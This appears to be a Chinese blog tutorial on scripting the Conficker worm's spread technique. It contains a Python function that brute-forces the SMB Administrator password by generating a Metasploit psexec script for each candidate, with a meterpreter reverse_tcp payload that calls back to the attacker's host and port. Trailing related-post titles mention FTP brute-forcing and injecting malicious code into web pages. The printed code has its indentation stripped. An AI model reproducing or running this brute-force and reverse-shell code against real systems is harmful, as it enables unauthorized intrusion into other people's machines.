【Python脚本进阶】2.4、conficker蠕虫(下):暴破口令,远程执行进程
目录
一、简介
分析:
二、实现
利用:
一、简介
分析:
尽管能成功地在被黑的主机上运行ms08 _ 067 netapi漏洞利用代码, 但防卫者也能很方便地通过安装最新的安全补丁来阻止漏洞利用代码被执行。
因此, 脚本还需要另一种也在Conficker蠕虫中使用过的攻击方法。它需要用暴力攻击的方式破解SMB用户名/密码, 以此获取权限在目标主机上远程执行 一个进程(psexec)。
二、实现
利用:
输入smbBurte函数的参数有: Metasploit脚本文件、目标主机、包含密码列表的另一个文件, 以及本机地址和端口
将用户名设为Windows的默认管理员administrator, 然后打开密码列表文件。对文件中的每个密码, 函数都会生成一个用来远程执行(psexec)进程的Metasploit脚本。如果某个用户名/密码对正确,远程执行进程的代码就会运行回连一个命令行shell到攻击者本机地址及对应的端口。
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):username = 'Administrator'pF = open( passwdFile, 'r' )for password in pF.readlines():password = password.strip('\n').strip('\r')configFile.write('use exploit/windows/smb/psexec\n')configFile.write('set SMBUser ' + str(username) + '\n')configFile.write('set SMBPass ' + str(password) + '\n')configFile.write('set RHOST ' + str(tgtHost) + '\n')configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')configFile.write('set LPORT ' + str(lport) + '\n')configFile.write('set LHOST ' + lhost + '\n')configFile.write('exploit -j -z\n')
【Python脚本进阶】2.4、conficker蠕虫(下):暴破口令,远程执行进程相关推荐
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(终)
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 用 python 脚本,把当前目录及子目录下的 wav 音频文件转换为 flac 格式
用 python 脚本,把当前目录及子目录下的 wav 音频文件转换为 flac 格式 import os, subprocessfor d,sd,files in os.walk('.'):for ...
- 【Python脚本进阶】2.1、端口扫描器(下):NMAP端口扫描
目录 一.简介 1.1.扩展 1.2.端口扫描类型 1.3.实现: 一.简介 1.1.扩展 由TCP连接扫描脚本,到其他类型的扫描,Nmap端口扫描工具包提供了大量的功能,如提供的ACK.RST.FI ...
- 【Python脚本进阶】2.1、端口扫描器(上):TCP全连接扫描
目录 一.简介 1.1.基础: 1.2.TCP: 二.TCP全连接扫描 2.1.简介: 2.2.函数: 2.3.实现: 第一步:获得主机名和端口 第二步: connScan和portScan函数 第三 ...
- 【Python脚本进阶】1.3、第二个脚本:Zip文件口令破解机
目录 一.简介 概述: 二.示例 示例: 优化 提高性能 任意性 注: 测试方法: 一.简介 概述: 编写Zip文件口令破解机要学习zipfile 库的使用方法 打开Python解释器, 我们用hel ...
- windows下通过eclipse进行远程执行出错:Permission denied:
前一阵子搭建好了windows下的hadoop开发环境,今天进行远程执行时报了一个异常: 14/02/26 10:33:52 WARNmapred.LocalJobRunner: job_local_ ...
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(下):在FTP服务器上搜索网页+注入代码
目录 一.在FTP服务器上搜索网页 1.1.函数: 1.2.实现: 二.在网页中加入恶意注入代码 2.1.分析: 2.2.函数: 2.3.实现: 一.在FTP服务器上搜索网页 1.1.函数: ftp. ...
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(中):使用Ftplib暴力破解FTP用户口令
一.简介 1.1.概述: 虽然匿名访问是进入系统的方式之一, 但攻击者也能成功地用偷来的用户名/密码访问合法的FTP 服务器.FileZilla 之类的FTP 客户端程序往往将密码以明文形式存储在配置 ...
- Linux下使用crontab命令以及Python脚本实现自动签到
转载:http://www.cnblogs.com/spxcds/p/5375192.html 关于这一部分, 我首先介绍下如何实现使用Python脚本实现签到功能其实,linux下有个命令叫做cur ...
- windows的.bat批处理文件运行Python脚本程序
windows的.bat批处理文件运行Python脚本程序 文章目录: 一.如何创建 `.bat` 批处理文件 二.创建执行的Python脚本程序 一.如何创建 .bat 批处理文件 创建.bat 批 ...
最新文章
- 轻松看懂机器学习十大常用算法
- 一个球从100m高度自由落下,第10次反弹多高
- GitHub遭攻击滥用以代管网钓套件
- PHp批量推送数据太慢,PHP非阻塞批量推送数据-php教程
- 关于FlexBox的布局
- 解决win10 .net framework 3.5安装失败0x800f081f
- java类同步_Java中方法,对象,类的同步
- 计算机管理ap,如何设置AC功能管理无线AP
- js删除mysql记录_(DELETEUPDATE)修改、删除数据记录_MySQL
- 阿里云数据库四位小伙伴聚齐!共同开启生态合作新篇章!
- 【调试工具】之IOS真机测试
- 【Computer Organization笔记05】运算器基本功能,定点运算器,Am2901的组成与功能,VHDL硬件描述语言
- murmurhash java_浅析ketamahash和murmurhash
- idea查看多级父类,实现的接口和子类的层次结构图
- 2020印象笔记日记模板及更改印象笔记背景色教程
- ug冲模标准件库_UG NX插件
- Laravel快速入门
- 音乐流媒体应用Polaris
- [并发并行]_[pthread]_[使用线程池并发复制文件]
- 利用Canvas 实现前端图片涂抹效果